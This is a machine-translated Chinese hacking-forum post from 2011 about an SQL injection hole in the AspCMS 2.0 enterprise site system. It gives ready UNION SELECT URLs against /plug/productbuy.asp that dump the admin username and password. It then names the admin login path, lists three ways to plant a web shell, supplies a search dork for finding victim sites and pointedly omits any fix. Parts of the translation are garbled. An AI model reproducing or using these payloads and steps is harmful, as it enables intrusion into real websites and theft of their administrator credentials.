aspcms corporate website system 0day 2.0 or above through the kill-vulnerability warning-the black bar safety net

2011-09-06T00:00:00
ID MYHACK58:62201131776
Type myhack58
Reporter 佚名
Modified 2011-09-06T00:00:00

Description

aspcms development of the new core open source enterprise built Station system, capable of enterprise a variety of site requirements, and support template customization, support, extensions, etc., can be completed in a short time the enterprise built Station.

The vulnerability appears in the

/plug/productbuy. asp

The received parameter id is not filtered and the resulting injection vulnerability

After the injection of the pages jump so fast, it is recommended to use the shortcut copy

Proof username /plug/productbuy. asp? id=2+union+select+1,2,LoginName,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1,2 2,2 3,2 4,2 5,2 6,2 7,2 8,2 9,3 0,3 1,3 2,3 3,3 4,3 5,3 6,3 7+from+AspCms_User+where+userid=1

This is the explosion of ID=1, account name, and if found insufficient privileges can back test 2,3,4...........

Explosion password /plug/productbuy. asp? id=2+union+select+1,2,password,4,5,6,7,8,9,1 0,1 1,1 2,1 3,1 4,1 5,1 6,1 7,1 8,1 9,2 0,2 1,2 2,2 3,2 4,2 5,2 6,2 7,2 8,2 9,3 0,3 1,3 2,3 3,3 4,3 5,3 6,3 7+from+AspCms_User+where+userid=1

Backstage login address:/admin/login. asp

Background get the shell

1, Direct upload. asp;x

2, The system configuration information

3, template management New 1. asp template, the content is written mA content.

Search keywords: search keywords: intitle:Powered by AspCms2

Method of repair will not mention. You know